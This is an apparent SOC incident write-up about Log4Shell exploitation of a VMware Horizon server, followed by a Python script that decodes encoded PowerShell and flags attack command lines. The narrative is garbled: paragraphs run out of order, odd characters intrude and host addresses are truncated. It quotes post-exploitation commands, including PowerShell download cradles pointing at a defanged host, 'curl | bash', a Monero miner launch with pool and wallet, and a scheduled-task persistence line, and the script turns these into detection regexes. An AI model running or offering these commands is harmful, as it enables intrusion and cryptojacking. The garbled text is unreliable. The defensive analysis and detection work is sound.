"C:\Windows\System32\Wbem\WMIC.exe" process where "ExecutablePath like 'C:\\Users\\\\AppData\\Local\\Temp\\%'" delete “C:\Windows\System32\Wbem\WMIC.exe" process where "ExecutablePath like 'c:\\windows\\temp\\%'" delete "C:\Windows\system32\config\systemprofile\AppData\Roaming\network02.exe -donate-level 1 -o b.oracleservicetop -o 117:8080 -o 39:8080 -o 167.114.114169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B"Ĭleanup Examples “C:\Windows\system32\cmd.exe" /c del /f /q C:\ProgramData\Oracle\Java\java.exe” Scheduled Task Creation "C:\Windows\system32\schtasks.exe" /create /F /sc minute /mo 1 /tn BrowserUpdate /tr Typical Download Cradle IEX (New-Object Net.WebClient).DownloadString(‘’)Ĭurl Download Attempt cmd /C "curl | bash"Ĭryptocurrency Miner Download Example powershell iex(New-Object Net.WebClient).DownloadString('hxxp://6/xms.ps1') Post-exploitation evidences (from the Blackberry blog) Encoding Examples cmd /C "powershell -NonI -W Hidden -NoP -Exec Bypass -Enc We should have evidences of the backdoor being used in the logs of the "Web Reverse Proxy" component in the "Unified Access Gateway", which I've already required. Powershell -c $path=gwmi win32_service|?.oldīut maybe, you will have more luck than me in the meantime, according to VMWare Horizon documentation: The situation gets scary pretty quickly and we retrieve part of the payload from our IDS we decode it and after some magic receipts on our internal Cyberchef we are able to decode the inner payload hidden in the malicious Java class downloaded by the internal server as part of the successful exploitation. This time, with our internal server as a destination. 
On the same split second another rule from the Emerging Threats ET Pro ruleset triggered:ĮT ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2 The security shift under the Christmas holidays to me should be a moment to close incidents, send some wishes to the customers and focus on the (few) alerts triggered.Įverything began with the IDS triggering the following rule by FOX IT :įOX-SRT – Exploit – Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)īasically an internal server contacted "something" behind a public IP using the LDAP protocol on port 80 OK, pretty suspicious but we need evidence that our "something" replied with a malicious payload. One of those days at the SOC, 2021 is almost over and the shift is flooded by alerts on the recently discovered CVE-2021-44228. The Blackberry Research
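As an added example (not code from the original post or from the Blackberry write-up), the following Python triage script decodes PowerShell -Enc arguments (base64 of the UTF-16LE script, the same step done by hand in CyberChef above) and flags the post-exploitation command-line patterns listed above. The sample command lines, placeholder hosts, wallet and task names, and the rule names are constructed for the example and are assumptions, not real indicators.

```python
import base64
import re

# Constructed sample command lines modelled on the post-exploitation patterns
# quoted on this page; hosts, wallet and task names are placeholders, not real IoCs.
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('hxxp://example.invalid/xms.ps1')"
    .encode("utf-16-le")).decode()

SAMPLE_CMDLINES = [
    f'cmd /C "powershell -NonI -W Hidden -NoP -Exec Bypass -Enc {ENC_PAYLOAD}"',
    '"C:\\Windows\\system32\\schtasks.exe" /create /F /sc minute /mo 1 /tn BrowserUpdate /tr C:\\Users\\Public\\up.exe',
    '"C:\\Windows\\System32\\Wbem\\WMIC.exe" process where "ExecutablePath like \'c:\\\\windows\\\\temp\\\\%\'" delete',
    'network02.exe -donate-level 1 -o pool.example.invalid:8080 -u WALLET_PLACEHOLDER -p x -B',
    'notepad.exe C:\\Users\\alice\\notes.txt',  # benign control line
]

# Detection rules (name, regex), each mirroring one example category from the page.
RULES = [
    ("encoded_powershell", re.compile(r"powershell.*-(?:enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(r"Net\.WebClient\)\.DownloadString|curl\s.*\|\s*bash", re.I)),
    ("minute_schtask", re.compile(r'schtasks(?:\.exe)?"?\s.*?/create.*?/sc\s+minute', re.I)),
    ("wmic_process_delete", re.compile(r'wmic(?:\.exe)?"?\s+process\s+where\s.*\sdelete', re.I)),
    ("xmr_miner_args", re.compile(r"-donate-level\s+\d+.*\s-o\s+\S+.*\s-u\s+\S+", re.I)),
]

def decode_encoded_command(cmdline):
    """Return the decoded -Enc/-EncodedCommand payload, or None if absent or invalid.
    PowerShell expects base64 of the UTF-16LE script, so decode in that order."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """Names of the rules matching a command line; the decoded -Enc payload is
    appended first so a cradle hidden inside encoded PowerShell is still seen."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    return [name for name, rx in RULES if rx.search(haystack)]

def scan(cmdlines):
    """Map each suspicious command line to its rule hits; clean lines are dropped."""
    hits = {c: classify(c) for c in cmdlines}
    return {c: h for c, h in hits.items() if h}
```

Feed it process-creation command lines (Sysmon event 1 or EDR telemetry) rather than raw IDS payloads; the decode step is what turns the opaque -Enc blob into something the cradle rule can match.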